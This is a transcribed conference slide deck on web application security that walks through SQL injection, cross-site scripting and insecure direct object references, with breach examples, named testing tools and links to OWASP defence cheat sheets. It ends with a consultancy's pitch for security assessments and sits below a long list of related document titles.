Web Applica+on Security: Be Offensive! About Me



Similar documents
OWASP Top Ten Tools and Tactics

How To Protect Your Data From Attack

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Where every interaction matters.

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Adobe Systems Incorporated

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

(WAPT) Web Application Penetration Testing

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Web Application Penetration Testing

Magento Security and Vulnerabilities. Roman Stepanov

The Top Web Application Attacks: Are you vulnerable?

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Implementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3

What is Web Security? Motivation

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web Application Security

Using Free Tools To Test Web Application Security

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

Check list for web developers

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

elearning for Secure Application Development

Web Application Vulnerability Testing with Nessus

OWASP AND APPLICATION SECURITY

Criteria for web application security check. Version

Web application security

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

Interactive Application Security Testing (IAST)

AppSec USA 2014 Denver, Colorado Security Header Injection Module (SHIM)

Cyber Security Challenge Australia 2014

SQuAD: Application Security Testing

Columbia University Web Security Standards and Practices. Objective and Scope

Security vulnerabilities in new web applications. Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

How to Secure TYPO3 Installations

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

Thick Client Application Security

Still Aren't Doing. Frank Kim

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Introduction to Web Application Security. Microsoft CSO Roundtable Houston, TX. September 13 th, 2006

Attack and Penetration Testing 101

Cross Site Scripting in Joomla Acajoom Component

Cross-Site Scripting

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

ACM SIG Security November 18, 2014

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Building & Measuring Security in Web Applications. Fabio Cerullo Cycubix Limited 30 May Belfast

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Penetration Testing in Romania

Excellence Doesn t Need a Certificate. Be an. Believe in You AMIGOSEC Consulting Private Limited

Guidelines for Web applications protection with dedicated Web Application Firewall

Java Web Application Security

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Overview of the Penetration Test Implementation and Service. Peter Kanters

Columbia University Web Application Security Standards and Practices. Objective and Scope

Web Application Security

Essential IT Security Testing

An Introduction to Application Security in J2EE Environments

Chapter 1 Web Application (In)security 1

Security Testing. Vulnerability Assessment vs Penetration Testing. Gabriel Mihai Tanase, Director KPMG Romania. 29 October 2014

Project 2: Web Security Pitfalls

Sichere Software- Entwicklung für Java Entwickler

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Auditing Web Applications

How To Understand And Understand The Security Of A Web Browser (For Web Users)

How to hack a website with Metasploit

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Web Application Security

DETAILED RISK ASSESSMENT REPORT

We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

05.0 Application Development

APPLICATION SECURITY AND ITS IMPORTANCE

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Top 10 Web Application Security Vulnerabilities - with focus on PHP

Web Application Firewall Profiling and Evasion. Michael Ritter Cyber Risk Services Deloitte

Web Application Guidelines

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Transcription:

Web Applica+on Security: Be Offensive! Eric Johnson Cypress Data Defense 1 About Me Eric Johnson (Twi<er: @emjohn20) Senior Security Consultant SANS AppSec Curriculum Product Manger CerLfied SANS Instructor & Course Author CerLficaLons CISSP, GWAPT, GSSP-.NET, GSSP- Java 2 1

Be Offensive! A good offense creates a business case for spending 3me and money on defense! 3 A<ack Techniques OWASP Top 10 (www.owasp.org) A1: InjecLon A3: Cross- Site ScripLng A4: Insecure Direct Object Reference 4 2

Disclaimer DemonstraLons of real a<ack tools Illegal to a<ack targets without wri<en contractual consent Obey your federal laws We assume no liability 5 A1 InjecLon SQL InjecLon, LDAP InjecLon, Command InjecLon 6 3

A1 InjecLon: In The News (1) May 2015 Gaana Music Service 12.5 million records Name, email, MD5 password hash, DoB, social media handles 7 A1 InjecLon: In The News (2) October 2013 677,000 accounts Name, address, DOB, phone numbers, passwords 8 4

A1 InjecLon: In The News (3) June 2012 6.5 million password hashes extracted from the database 4+ million SHA1 hashes reversed within a few days 9 A1 InjecLon: In The News (4) August 2009 130 million credit card numbers $200 million loss 10 5

A1 InjecLon: ExploitaLon sqlmap DEMO h<p://sqlmap.org/ Wri<en in Python 11 A1 InjecLon: Defenses OWASP SQL InjecLon PrevenLon Cheat Sheet h<ps://www.owasp.org/index.php/ SQL_InjecLon_PrevenLon_Cheat_Sheet 12 6

A3 Cross- Site ScripLng (XSS) XSS flaws occur whenever an applicalon takes untrusted data and sends it to a web browser without proper encoding. Execute scripts in the viclm s browser Hijack user sessions Deface web sites Redirect the user to malicious sites. 13 A3 XSS: In The News (1) August 2009 14 7

A3 XSS: In The News (2) March 2008 Site defaced to contain flashing images designed to cause seizures Some viclms required hospital care 15 A3 XSS: In The News (3) June 2009 Offered $10,000 reward to anyone that broke into the CEO s email account Email interface vulnerable to XSS and session hijacking 16 8

A3 XSS: ExploitaLon Browser ExploitaLon Framework (BeEF) h<p://beefproject.com/ Wri<en in Ruby 17 A3 XSS: Defenses OWASP XSS PrevenLon Cheat Sheet h<ps://www.owasp.org/index.php/ XSS_(Cross_Site_ScripLng)_PrevenLon_Cheat_Sheet 18 9

A4 Insecure Direct Object Reference Accessing backend data using un- trusted request parameters data a<ackers can manipulate. File Directory Database key 19 A4: In The News (1) April 2015 Site allowed any user to delete any video Event_id request parameter Bug bounty paid $5,000 20 10

A4: In The News (2) October 2013 Site allowed users to download other customer s SMS message history Phone number in the query string 21 A4: In The News (3) September 2013 Site allowed users to delete another user s photos Profile id and photo id request parameters Bug bounty paid $12,500 22 11

A4: ExploitaLon Burp Suite Intruder Plugin Free & Professional Version h<p://portswigger.net Wri<en in Java 23 A4: MiLgaLons OWASP Access Control Cheat Sheet h<ps://www.owasp.org/index.php/ Access_Control_Cheat_Sheet 24 12

Who is at risk? Does your company store sensilve informalon? Are you storing payment card informalon? Does your company store health care records? Are you compliant with federal and state laws? Do you work with companies or third party vendors that store this type of informalon? Open Lmes, it comes down to one main issue. WE DON T KNOW. And if there is uncertainty with our own company, the risk only increases as you work with vendors and third parles. 25 Security Training Security Reviews Help me, Obi- Wan Kenobi. You re my only hope. 26 13

27 Security Assessment OpLons Features Sta+c Review Manual Review Hybrid Review StaLc ApplicaLon Security TesLng (SAST) Manual Code Review Manual Dynamic TesLng Dynamic ApplicaLon Security TesLng (DAST) Results ValidaLon ApplicaLon Security Assessment Report RemediaLon Training & ConsulLng Our team can conduct the assessment remotely in a safe and secure environment, or we can come directly to the facility and conduct the review on site. 28 14

Thank You! QuesLons? @emjohn20 eric.johnson@cypressdefense.com 29 15

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information